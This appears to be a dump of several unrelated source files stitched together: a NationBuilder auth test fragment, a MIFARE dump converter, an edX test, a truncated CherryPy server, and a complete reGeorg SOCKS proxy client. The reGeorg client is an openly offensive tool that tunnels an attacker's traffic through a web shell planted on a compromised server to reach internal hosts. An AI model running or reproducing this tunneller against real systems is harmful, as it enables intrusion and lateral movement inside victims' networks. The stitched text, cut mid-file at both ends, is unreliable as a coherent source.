'last_rule_violation_at': None,
'sex': None,
'full_name': 'Foo Bar',
'last_donated_at': None,
'donations_pledged_amount_in_cents': 0,
'primary_email_id': 1,
'media_market_name': None,
'capital_amount_in_cents': 500,
'datatrust_id': None,
'precinct_code': None,
'email3': None,
'religion': None,
'first_prospect_at': None,
'judicial_district': None,
'donations_count_this_cycle': 0,
'work_address': None,
'is_twitter_follower': False,
'email1': 'foobar@gmail.com',
'email': 'foobar@gmail.com',
'contact_status_name': None,
'mobile_opt_in': True,
'twitter_description': None,
'parent': None,
'tags': [],
'first_volunteer_at': None,
'inferred_support_level': None,
'banned_at': None,
'first_invoice_at': None,
'donations_raised_count_this_cycle': 0,
'is_donor': False,
'twitter_location': None,
'email1_is_bad': False,
'legal_name': None,
'language': None,
'registered_at': None,
'call_status_id': None,
'last_invoice_at': None,
'school_sub_district': None,
'village_district': None,
'twitter_name': None,
'membership_started_at': None,
'subnations': [],
'meetup_address': None,
'author_id': None,
'registered_address': None,
'external_id': None,
'twitter_login': None,
'inferred_party': None,
'spent_capital_amount_in_cents': 0,
'suffix': None,
'mailing_address': None,
'is_leaderboardable': True,
'twitter_website': None,
'nbec_guid': None,
'city_district': None,
'church': None,
'is_profile_searchable': True,
'employer': None,
'is_fundraiser': False,
'email_opt_in': True,
'recruits_count': 0,
'email2_is_bad': False,
'county_district': None,
'recruiter': None,
'twitter_friends_count': None,
'facebook_username': None,
'active_customer_started_at': None,
'pf_strat_id': None,
'locale': None,
'twitter_address': None,
'is_supporter': True,
'do_not_call': False,
'profile_image_url_ssl': 'https://d3n8a8pro7vhmx.cloudfront.net'
'/assets/icons/buddy.png',
'invoices_amount_in_cents': None,
'username': None,
'donations_amount_in_cents': 0,
'is_volunteer': False,
'civicrm_id': None,
'supranational_district': None,
'precinct_name': None,
'invoice_payments_amount_in_cents': None,
'work_phone_number': None,
'phone': '213.394.4623',
'received_capital_amount_in_cents': 500,
'primary_address': None,
'is_possible_duplicate': False,
'invoice_payments_referred_amount_in_cents': None,
'donations_amount_this_cycle_in_cents': 0,
'priority_level': None,
'first_fundraised_at': None,
'phone_normalized': '2133944623',
'rnc_regid': None,
'twitter_id': None,
'birthdate': None,
'mobile': None,
'federal_district': None,
'donations_to_raise_amount_in_cents': 0,
'support_probability_score': None,
'invoices_count': None,
'nbec_precinct_code': None,
'website': None,
'closed_invoices_amount_in_cents': None,
'home_address': None,
'school_district': None,
'support_level': None,
'demo': None,
'children_count': 0,
'updated_at': '2015-02-02T19:30:28-08:00',
'membership_level_name': None,
'billing_address': None,
'is_ignore_donation_limits': False,
'signup_type': 0,
'precinct_id': None,
'rnc_id': None,
'id': 2,
'ethnicity': None,
'is_survey_question_private': False,
'middle_name': None,
'author': None,
'last_fundraised_at': None,
'state_file_id': None,
'note': None,
'submitted_address': None,
'support_level_changed_at': None,
'party': None,
'contact_status_id': None,
'outstanding_invoices_amount_in_cents': None,
'page_slug': None,
'outstanding_invoices_count': None,
'first_recruited_at': None,
'county_file_id': None,
'first_name': 'Foo',
'facebook_profile_url': None,
'city_sub_district': None,
'has_facebook': False,
'is_deceased': False,
'labour_region': None,
'state_lower_district': None,
'dw_id': None,
'created_at': '2015-02-02T19:30:28-08:00',
'is_prospect': False,
'priority_level_changed_at': None,
'is_mobile_bad': False,
'overdue_invoices_count': None,
'ngp_id': None,
'do_not_contact': False,
'first_donated_at': None,
'turnout_probability_score': None
},
'precinct': None
})
def test_login(self):
self.strategy.set_settings({
'SOCIAL_AUTH_NATIONBUILDER_SLUG': 'foobar'
})
self.do_login()
def test_partial_pipeline(self):
self.strategy.set_settings({
'SOCIAL_AUTH_NATIONBUILDER_SLUG': 'foobar'
})
self.do_partial_pipeline()
| bsd-3-clause |
xl7dev/WebShell | reGeorg-master/reGeorgSocksProxy.py | 1 | 16189 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import argparse
import signal
import sys
import atexit
import httplib
import urllib3
from threading import Thread
from urlparse import urlparse
from socket import *
from threading import Thread
from time import sleep
#import struct
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT=300
VER="\x05"
METHOD="\x00"
SUCCESS="\x00"
SOCKFAIL="\x01"
NETWORKFAIL="\x02"
HOSTFAIL="\x04"
REFUSED="\x05"
TTLEXPIRED="\x06"
UNSUPPORTCMD="\x07"
ADDRTYPEUNSPPORT="\x08"
UNASSIGNED="\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
#Logging
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
LEVEL = {"INFO" : logging.INFO,
"DEBUG" : logging.DEBUG,
}
logLevel = "INFO"
COLORS = {
'WARNING' : YELLOW,
'INFO' : WHITE,
'DEBUG' : BLUE,
'CRITICAL' : YELLOW,
'ERROR' : RED,
'RED' : RED,
'GREEN' : GREEN,
'YELLOW' : YELLOW,
'BLUE' : BLUE,
'MAGENTA' : MAGENTA,
'CYAN' : CYAN,
'WHITE' : WHITE,
}
def formatter_message(message, use_color = True):
if use_color:
message = message.replace("$RESET", RESET_SEQ).replace("$BOLD", BOLD_SEQ)
else:
message = message.replace("$RESET", "").replace("$BOLD", "")
return message
class ColoredFormatter(logging.Formatter):
def __init__(self, msg, use_color = True):
logging.Formatter.__init__(self, msg)
self.use_color = use_color
def format(self, record):
levelname = record.levelname
if self.use_color and levelname in COLORS:
levelname_color = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + RESET_SEQ
record.levelname = levelname_color
return logging.Formatter.format(self, record)
class ColoredLogger(logging.Logger):
def __init__(self, name):
FORMAT = "[$BOLD%(levelname)-18s$RESET] %(message)s"
COLOR_FORMAT = formatter_message(FORMAT, True)
logging.Logger.__init__(self, name, logLevel)
if (name == "transfer"):
COLOR_FORMAT = "\x1b[80D\x1b[1A\x1b[K%s" % COLOR_FORMAT
color_formatter = ColoredFormatter(COLOR_FORMAT)
console = logging.StreamHandler()
console.setFormatter(color_formatter)
self.addHandler(console)
return
logging.setLoggerClass(ColoredLogger)
log = logging.getLogger(__name__)
transferLog = logging.getLogger("transfer")
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self,pSocket,connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
if o.scheme == "http":
self.httpScheme = urllib3.HTTPConnectionPool
else:
self.httpScheme = urllib3.HTTPSConnectionPool
def parseSocks5(self,sock):
log.debug("SocksVersion5 detected")
nmethods,methods=(sock.recv(1),sock.recv(1))
sock.sendall(VER+METHOD)
ver=sock.recv(1)
if ver=="\x02": # this is a hack for proxychains
ver,cmd,rsv,atyp=(sock.recv(1),sock.recv(1),sock.recv(1),sock.recv(1))
else:
cmd,rsv,atyp=(sock.recv(1),sock.recv(1),sock.recv(1))
target = None
targetPort = None
if atyp=="\x01":# IPv4
# Reading 6 bytes for the IP and Port
target = sock.recv(4)
targetPort = sock.recv(2)
target =".".join([str(ord(i)) for i in target])
elif atyp=="\x03":# Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp=="\x04":# IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr=[]
for i in xrange(len(target)/2):
tmp_addr.append(unichr(ord(target[2*i])*256+ord(target[2*i+1])))
target=":".join(tmp_addr)
targetPort = ord(targetPort[0])*256+ord(targetPort[1])
if cmd=="\x02":#BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd=="\x03":#UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd=="\x01":#CONNECT
serverIp = target
try:
serverIp = gethostbyname(target)
except:
log.error("oeps")
serverIp="".join([chr(int(i)) for i in serverIp.split(".")])
self.cookie = self.setupRemoteSession(target,targetPort)
if self.cookie:
sock.sendall(VER+SUCCESS+"\x00"+"\x01"+serverIp+chr(targetPort/256)+chr(targetPort%256))
return True
else:
sock.sendall(VER+REFUSED+"\x00"+"\x01"+serverIp+chr(targetPort/256)+chr(targetPort%256))
raise RemoteConnectionFailed("[%s:%d] Remote failed" %(target,targetPort))
raise SocksCmdNotImplemented("Socks5 - Unknown CMD")
def parseSocks4(self,sock):
log.debug("SocksVersion4 detected")
cmd=sock.recv(1)
if cmd == "\x01": # Connect
targetPort = sock.recv(2)
targetPort = ord(targetPort[0])*256+ord(targetPort[1])
target = sock.recv(4)
sock.recv(1)
target =".".join([str(ord(i)) for i in target])
serverIp = target
try:
serverIp = gethostbyname(target)
except:
log.error("oeps")
serverIp="".join([chr(int(i)) for i in serverIp.split(".")])
self.cookie = self.setupRemoteSession(target,targetPort)
if self.cookie:
sock.sendall(chr(0)+chr(90)+serverIp+chr(targetPort/256)+chr(targetPort%256))
return True
else:
sock.sendall("\x00"+"\x91"+serverIp+chr(targetPort/256)+chr(targetPort%256))
raise RemoteConnectionFailed("Remote connection failed")
else:
raise SocksProtocolNotImplemented("Socks4 - Command [%d] Not implemented" % ord(cmd))
def handleSocks(self,sock):
# This is where we setup the socks connection
ver = sock.recv(1)
if ver == "\x05":
return self.parseSocks5(sock)
elif ver == "\x04":
return self.parseSocks4(sock)
def setupRemoteSession(self,target,port):
headers = {"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": port}
self.target = target
self.port = port
cookie = None
conn = self.httpScheme(host=self.httpHost, port=self.httpPort)
#response = conn.request("POST", self.httpPath, params, headers)
response = conn.urlopen('POST', self.connectString+"?cmd=connect&target=%s&port=%d" % (target,port), headers=headers, body="")
if response.status == 200:
status = response.getheader("x-status")
if status == "OK":
cookie = response.getheader("set-cookie")
log.info("[%s:%d] HTTP [200]: cookie [%s]" % (self.target,self.port,cookie))
else:
if response.getheader("X-ERROR") != None:
log.error(response.getheader("X-ERROR"))
else:
log.error("[%s:%d] HTTP [%d]: [%s]" % (self.target,self.port,response.status,response.getheader("X-ERROR")))
log.error("[%s:%d] RemoteError: %s" % (self.target,self.port,response.data))
conn.close()
return cookie
def closeRemoteSession(self):
headers = {"X-CMD": "DISCONNECT", "Cookie":self.cookie}
#headers = {"Cookie":self.cookie}
params=""
conn = self.httpScheme(host=self.httpHost, port=self.httpPort)
response = conn.request("POST", self.httpPath+"?cmd=disconnect", params, headers)
if response.status == 200:
log.info("[%s:%d] Connection Terminated" % (self.target,self.port))
conn.close()
def reader(self):
conn = urllib3.PoolManager()
while True:
try:
if not self.pSocket: break
data =""
headers = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = conn.urlopen('POST', self.connectString+"?cmd=read", headers=headers, body="")
data = None
if response.status == 200:
status = response.getheader("x-status")
if status == "OK":
if response.getheader("set-cookie") != None:
cookie = response.getheader("set-cookie")
data = response.data
# Yes I know this is horrible, but its a quick fix to issues with tomcat 5.x bugs that have been reported, will find a propper fix laters
try:
if response.getheader("server").find("Apache-Coyote/1.1") > 0:
data = data[:len(data)-1]
except:
pass
if data == None: data=""
else:
data = None
log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target,self.port,response.status,status,response.getheader("X-ERROR")))
else:
log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target,self.port,response.status))
if data == None:
# Remote socket closed
break
if len(data) == 0:
sleep(0.1)
continue
transferLog.info("[%s:%d] <<<< [%d]" % (self.target,self.port,len(data)))
self.pSocket.send(data)
except Exception,ex:
raise ex
self.closeRemoteSession()
log.debug("[%s:%d] Closing localsocket" % (self.target,self.port))
try:
self.pSocket.close()
except:
log.debug("[%s:%d] Localsocket already closed" % (self.target,self.port))
def writer(self):
global READBUFSIZE
conn = urllib3.PoolManager()
while True:
try:
self.pSocket.settimeout(1)
data = self.pSocket.recv(READBUFSIZE)
if not data: break
headers = {"X-CMD": "FORWARD", "Cookie": self.cookie,"Content-Type": "application/octet-stream", "Connection":"Keep-Alive"}
response = conn.urlopen('POST', self.connectString+"?cmd=forward", headers=headers, body=data)
if response.status == 200:
status = response.getheader("x-status")
if status == "OK":
if response.getheader("set-cookie") != None:
self.cookie = response.getheader("set-cookie")
else:
log.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (self.target,self.port,response.status,status,response.getheader("x-error")))
break
else:
log.error("[%s:%d] HTTP [%d]: Shutting down" % (self.target,self.port,response.status))
break
transferLog.info("[%s:%d] >>>> [%d]" % (self.target,self.port,len(data)))
except timeout:
continue
except Exception,ex:
raise ex
break
self.closeRemoteSession()
log.debug("Closing localsocket")
try:
self.pSocket.close()
except:
log.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
log.debug("Staring reader")
r = Thread(target=self.reader, args=())
r.start()
log.debug("Staring writer")
w = Thread(target=self.writer, args=())
w.start()
r.join()
w.join()
except SocksCmdNotImplemented, si:
log.error(si.message)
self.pSocket.close()
except SocksProtocolNotImplemented, spi:
log.error(spi.message)
self.pSocket.close()
except Exception, e:
log.error(e.message)
self.pSocket.close()
def askGeorg(connectString):
connectString = connectString
o = urlparse(connectString)
try:
httpPort = o.port
except:
if o.scheme == "https":
httpPort = 443
else:
httpPort = 80
httpScheme = o.scheme
httpHost = o.netloc.split(":")[0]
httpPath = o.path
if o.scheme == "http":
httpScheme = urllib3.HTTPConnectionPool
else:
httpScheme = urllib3.HTTPSConnectionPool
conn = httpScheme(host=httpHost, port=httpPort)
response = conn.request("GET", httpPath)
if response.status == 200:
if BASICCHECKSTRING == response.data.strip():
log.info(BASICCHECKSTRING)
return True
conn.close()
return False
if __name__ == '__main__':
print """\033[1m
\033[1;33m _____
_____ ______ __|___ |__ ______ _____ _____ ______
| | | ___|| ___| || ___|/ \| | | ___|
| \ | ___|| | | || ___|| || \ | | |
|__|\__\|______||______| __||______|\_____/|__|\__\|______|
|_____|
... every office needs a tool like Georg
willem@sensepost.com / @_w_m__
sam@sensepost.com / @trowalts
etienne@sensepost.com / @kamp_staaldraad
\033[0m
"""
log.setLevel(logging.DEBUG)
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l","--listen-on",metavar="",help="The default listening address",default="127.0.0.1")
parser.add_argument("-p","--listen-port",metavar="",help="The default listening port",type=int,default="8888")
parser.add_argument("-r","--read-buff",metavar="",help="Local read buffer, max data to be sent per POST",type=int,default="1024")
parser.add_argument("-u","--url",metavar="",required=True,help="The url containing the tunnel script")
parser.add_argument("-v","--verbose",metavar="",help="Verbose output[INFO|DEBUG]",default="INFO")
args = parser.parse_args()
if (LEVEL.has_key(args.verbose)):
log.setLevel(LEVEL[args.verbose])
log.info("Log Level set to [%s]" % args.verbose)
log.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on,args.listen_port,args.url))
log.info("Checking if Georg is ready")
if not askGeorg(args.url):
log.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
servSock = socket(AF_INET,SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
servSock.bind((args.listen_on,args.listen_port))
servSock.listen(1000)
while True:
try:
sock,addr_info=servSock.accept()
sock.settimeout(SOCKTIMEOUT)
log.debug("Incomming connection")
session(sock,args.url).start()
except KeyboardInterrupt,ex:
break
except Exception,e:
log.error(e)
servSock.close()
| gpl-2.0 |
NocFlame/MifareClassicTool | tools/dump-file-converter/mct2eml.py | 7 | 1685 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
########################################################################
#
# Copyright 2015 Gerhard Klostermeier
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
########################################################################
from sys import exit, argv
def main():
""" Convert a MCT dump file to a .eml file (Proxmark3 emulator). """
# Are there enouth arguments?
if len(argv) is not 3:
usage()
# TODO: Check if the dump is comple (has all sectors and no unknown data)
# and if not, create the missing data.
# (0x00 for data, 0xFF for keys and 0x078069)
# Convert the file line by line.
with open(argv[1], 'r') as mctFile, open(argv[2], 'w') as emlFile:
for line in mctFile:
if line[:8] == '+Sector:':
continue
emlFile.write(line.lower())
def usage():
""" Print the usage. """
print('Usage: ' + argv[0] + ' <mct-dump> <output-file-(eml)>')
print('INFO: MCT dump has to be complete ' +
'(all sectors and no unknown data).')
exit(1);
if __name__ == '__main__':
main()
| gpl-3.0 |
Edraak/edraak-platform | common/lib/xmodule/xmodule/tests/test_randomize_module.py | 13 | 3955 | """
Test cases covering workflows and behaviors for the Randomize XModule
"""
import unittest
from datetime import datetime, timedelta
from pytz import UTC
from opaque_keys.edx.locator import BlockUsageLocator
from xblock.fields import ScopeIds
from xmodule.randomize_module import RandomizeModule
from .test_course_module import DummySystem as DummyImportSystem
ORG = 'test_org'
COURSE = 'test_course'
START = '2013-01-01T01:00:00'
_TODAY = datetime.now(UTC)
_LAST_WEEK = _TODAY - timedelta(days=7)
_NEXT_WEEK = _TODAY + timedelta(days=7)
class RandomizeModuleTestCase(unittest.TestCase):
"""Make sure the randomize module works"""
shard = 1
def setUp(self):
"""
Initialize dummy testing course.
"""
super(RandomizeModuleTestCase, self).setUp()
self.system = DummyImportSystem(load_error_modules=True)
self.system.seed = None
self.course = self.get_dummy_course()
self.modulestore = self.system.modulestore
def get_dummy_course(self, start=_TODAY):
"""Get a dummy course"""
self.start_xml = '''
<course org="{org}" course="{course}"
graceperiod="1 day" url_name="test"
start="{start}">
<chapter url="ch1" url_name="chapter1" display_name="CH1">
<randomize url_name="my_randomize">
<html url_name="a" display_name="A">Two houses, ...</html>
<html url_name="b" display_name="B">Three houses, ...</html>
</randomize>
</chapter>
<chapter url="ch2" url_name="chapter2" display_name="CH2">
</chapter>
</course>
'''.format(org=ORG, course=COURSE, start=start)
return self.system.process_xml(self.start_xml)
def test_import(self):
"""
Just make sure descriptor loads without error
"""
self.get_dummy_course(START)
def test_course_has_started(self):
"""
Test CourseDescriptor.has_started.
"""
self.course.start = _LAST_WEEK
self.assertTrue(self.course.has_started())
self.course.start = _NEXT_WEEK
self.assertFalse(self.course.has_started())
def test_children(self):
""" Check course/randomize module works fine """
self.assertTrue(self.course.has_children)
self.assertEquals(len(self.course.get_children()), 2)
def inner_get_module(descriptor):
"""
Override systems.get_module
This method will be called when any call is made to self.system.get_module
"""
if isinstance(descriptor, BlockUsageLocator):
location = descriptor
descriptor = self.modulestore.get_item(location, depth=None)
descriptor.xmodule_runtime = self.get_dummy_course()
descriptor.xmodule_runtime.descriptor_runtime = descriptor._runtime # pylint: disable=protected-access
descriptor.xmodule_runtime.get_module = inner_get_module
return descriptor
self.system.get_module = inner_get_module
# Get randomize_descriptor from the course & verify its children
randomize_descriptor = inner_get_module(self.course.id.make_usage_key('randomize', 'my_randomize'))
self.assertTrue(randomize_descriptor.has_children)
self.assertEquals(len(randomize_descriptor.get_children()), 2)
# Call RandomizeModule which will select an element from the list of available items
randomize_module = RandomizeModule(
randomize_descriptor,
self.system,
scope_ids=ScopeIds(None, None, self.course.id, self.course.id)
)
# Verify the selected child
self.assertEquals(len(randomize_module.get_child_descriptors()), 1, "No child is chosen")
self.assertIn(randomize_module.child.display_name, ['A', 'B'], "Unwanted child selected")
| agpl-3.0 |
sesuncedu/sdhash | sdhash-ui/cherrypy/wsgiserver/wsgiserver3.py | 82 | 78074 | """A high-speed, production ready, thread pooled, generic HTTP server.
Simplest example on how to use this module directly
(without using CherryPy's application machinery)::
from cherrypy import wsgiserver
def my_crazy_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type','text/plain')]
start_response(status, response_headers)
return ['Hello world!']
server = wsgiserver.CherryPyWSGIServer(
('0.0.0.0', 8070), my_crazy_app,
server_name='www.cherrypy.example')
server.start()
The CherryPy WSGI server can serve as many WSGI applications
as you want in one instance by using a WSGIPathInfoDispatcher::
d = WSGIPathInfoDispatcher({'/': my_crazy_app, '/blog': my_blog_app})
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', 80), d)
Want SSL support? Just set server.ssl_adapter to an SSLAdapter instance.
This won't call the CherryPy engine (application side) at all, only the
HTTP server, which is independent from the rest of CherryPy. Don't
let the name "CherryPyWSGIServer" throw you; the name merely reflects
its origin, not its coupling.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = CherryPyWSGIServer(...)
server.start()
while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
"""
__all__ = ['HTTPRequest', 'HTTPConnection', 'HTTPServer',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'CP_makefile',
'MaxSizeExceeded', 'NoSSLError', 'FatalSSLAlert',
'WorkerThread', 'ThreadPool', 'SSLAdapter',
'CherryPyWSGIServer',
'Gateway', 'WSGIGateway', 'WSGIGateway_10', 'WSGIGateway_u0',
'WSGIPathInfoDispatcher', 'get_ssl_adapter_class']
import os
try:
import queue
except:
import Queue as queue
import re
import email.utils
import socket
import sys
if 'win' in sys.platform and not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
if sys.version_info < (3,1):
import io
else:
import _pyio as io
DEFAULT_BUFFER_SIZE = io.DEFAULT_BUFFER_SIZE
import threading
import time
from traceback import format_exc
from urllib.parse import unquote
from urllib.parse import urlparse
from urllib.parse import scheme_chars
import warnings
if sys.version_info >= (3, 0):
bytestr = bytes
unicodestr = str
basestring = (bytes, str)
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 3, the native string type is unicode
return n.encode(encoding)
else:
bytestr = str
unicodestr = unicode
basestring = basestring
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 2, the native string type is bytes. Assume it's already
# in the given encoding, which for ISO-8859-1 is almost always what
# was intended.
return n
LF = ntob('\n')
CRLF = ntob('\r\n')
TAB = ntob('\t')
SPACE = ntob(' ')
COLON = ntob(':')
SEMICOLON = ntob(';')
EMPTY = ntob('')
NUMBER_SIGN = ntob('#')
QUESTION_MARK = ntob('?')
ASTERISK = ntob('*')
FORWARD_SLASH = ntob('/')
quoted_slash = re.compile(ntob("(?i)%2F"))
import errno
def plat_specific_errors(*errnames):
"""Return error numbers for all errors in errnames on this platform.
The 'errno' module contains different global constants depending on
the specific platform (OS). This function will return the list of
numeric values for a given list of potential names.
"""
errno_names = dir(errno)
nums = [getattr(errno, k) for k in errnames if k in errno_names]
# de-dupe the list
return list(dict.fromkeys(nums).keys())
socket_error_eintr = plat_specific_errors("EINTR", "WSAEINTR")
socket_errors_to_ignore = plat_specific_errors(
"EPIPE",
"EBADF", "WSAEBADF",
"ENOTSOCK", "WSAENOTSOCK",
"ETIMEDOUT", "WSAETIMEDOUT",
"ECONNREFUSED", "WSAECONNREFUSED",
"ECONNRESET", "WSAECONNRESET",
"ECONNABORTED", "WSAECONNABORTED",
"ENETRESET", "WSAENETRESET",
"EHOSTDOWN", "EHOSTUNREACH",
)
socket_errors_to_ignore.append("timed out")
socket_errors_to_ignore.append("The read operation timed out")
socket_errors_nonblocking = plat_specific_errors(
'EAGAIN', 'EWOULDBLOCK', 'WSAEWOULDBLOCK')
comma_separated_headers = [ntob(h) for h in
['Accept', 'Accept-Charset', 'Accept-Encoding',
'Accept-Language', 'Accept-Ranges', 'Allow', 'Cache-Control',
'Connection', 'Content-Encoding', 'Content-Language', 'Expect',
'If-Match', 'If-None-Match', 'Pragma', 'Proxy-Authenticate', 'TE',
'Trailer', 'Transfer-Encoding', 'Upgrade', 'Vary', 'Via', 'Warning',
'WWW-Authenticate']]
import logging
if not hasattr(logging, 'statistics'): logging.statistics = {}
def read_headers(rfile, hdict=None):
"""Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
if line[0] in (SPACE, TAB):
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError("Illegal header line.")
# TODO: what about TE and WWW-Authenticate?
k = k.strip().title()
v = v.strip()
hname = k
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
v = b", ".join((existing, v))
hdict[hname] = v
return hdict
class MaxSizeExceeded(Exception):
pass
class SizeCheckWrapper(object):
"""Wraps a file-like object, raising MaxSizeExceeded if too large."""
def __init__(self, rfile, maxlen):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded()
def read(self, size=None):
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See http://www.cherrypy.org/ticket/421
if len(data) < 256 or data[-1:] == "\n":
return EMPTY.join(res)
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline()
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline()
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
def next(self):
data = self.rfile.next()
self.bytes_read += len(data)
self._check_length()
return data
class KnownLengthRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted."""
def __init__(self, rfile, content_length):
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
if self.remaining == 0:
return b''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.remaining -= len(data)
return data
class ChunkedRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
"""
def __init__(self, rfile, maxlen, bufsize=8192):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded("Request Entity Too Large", self.maxlen)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError("Bad chunked transfer size: " + repr(chunk_size))
if chunk_size <= 0:
self.closed = True
return
## if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError("Request Entity Too Large")
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
"got " + repr(crlf) + ")")
def read(self, size=None):
data = EMPTY
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
def readline(self, size=None):
data = EMPTY
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
newline_pos = self.buffer.find(LF)
if size:
if newline_pos == -1:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
remaining = min(size - len(data), newline_pos)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
if newline_pos == -1:
data += self.buffer
else:
data += self.buffer[:newline_pos]
self.buffer = self.buffer[newline_pos:]
def readlines(self, sizehint=0):
